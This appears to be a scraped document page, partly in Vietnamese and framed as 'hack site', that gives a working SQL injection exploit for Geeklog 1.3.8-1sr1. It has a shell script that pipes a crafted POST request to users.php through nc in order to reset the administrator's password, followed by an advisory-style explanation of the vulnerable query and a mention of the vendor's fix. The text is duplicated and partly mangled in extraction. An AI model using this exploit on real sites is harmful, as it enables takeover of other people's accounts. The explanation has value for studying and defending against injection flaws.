Sql Injection Exploit Code

Sql Injection Exploit Codehack site Geeklog version 1.3.8-1sr1 Đôi nét về greedlog.net http://www.geeklog.net/ Đây là một dạng portal download free dùng rất nhiều cho site tin tức vvvv khá phổ biến. Lỗi sql injection được tìm thấy trong file users.php 2.code khai thác Exploit: #!/bin/sh echo "POST /path/to/gl/users.php HTTP/1.0 Content-length: 50 Content-type: application/x-www-form-urlencoded mode=setnewpwd&passwd=new&uid=2&rid=3+or+uid=1&" | nc localhost 80 This should change the Admin users password to "new". You have to change the /path/to/gl/users.php according to your Geeklog installation. Immune systems: * Geeklog version 1.3.8-1sr2 The below exploit uses the "forgot password" feature introduced in Geeklog 1.3.8. By constructing a certain...
Nội dung trích xuất từ tài liệu:
Sql Injection Exploit CodeSql Injection Exploit Codehack site Geeklog version 1.3.8-1sr1Đôi nét về greedlog.nethttp://www.geeklog.net/Đây là một dạng portal download free dùng rất nhiều cho site tin tức vvvv khá phổ biến. Lỗi sql injectionđược tìm th ấy trong file users.php2.code khai thácExploit:#!/bin/shecho POST /path/to/gl/users.php HTTP/1.0Content-length: 50Content-type: application/x-www-form-urlencodedmode=setnewpwd&passwd=new&uid=2&rid=3+or+uid=1& | nc localhost 80This should change the Admin users password to new. You have to change the /path/to/gl/users.phpaccording to your Geeklog installation.Immune systems:* Geeklog version 1.3.8-1sr2The below exploit uses the forgot password feature introduced in Geeklog 1.3.8. By constructing a certainkind of HTTP request, an attacker can change any users Geeklog password, including the administratorpassword. This is because an SQL injection problem. In users.php we have this kind of code (line about750):if (!empty($uid) && is_numeric($uid) && !empty($reqid)) {$valid = DB_count($_TABLES[users], arrary(uid, pwrequestid),array($uid, $reqid));if ($valid==1) {// generate an md5 hash for the new password and change it} else {// invalid request, display error message}}The database module layer hides the actual SQL queries and this does not look very clear yet, but if we logall SQL queries executed, we see that the above code produces this SQL (with e.g. $uid=2 and $reqid=3):SELECT COUNT(*) FROM gl_users WHERE uid = 2 AND pwrequestid = 3The password is changed only if the count returned by this query is exactly one. The only check done for$reqid is that it is not empty. It can contain anything, so changing $reqid to e.g. 3 or uid=1 the SQLserver will get this query instead:SELECT COUNT(*) FROM gl_usersWHERE uid = 2 AND pwrequestid = 3 or uid=1The pwrequestid = 3 condition is false unless the admin user really forgot the password and uses thisfeature at the same time (very unlikely). However, because of the or uid=1 part, the query will still returnone, because a user with uid=1 exists (the Anonymous user). So, the $valid variable in the above code isset to one and the password is changed.This of course has nothing to do with displaying error messages. The exploit does not produce any errormessage because the SQL code above is correct.Jouko has informed Geeklog developers about this and they have released a fixed version, seehttp://www.geeklog.net/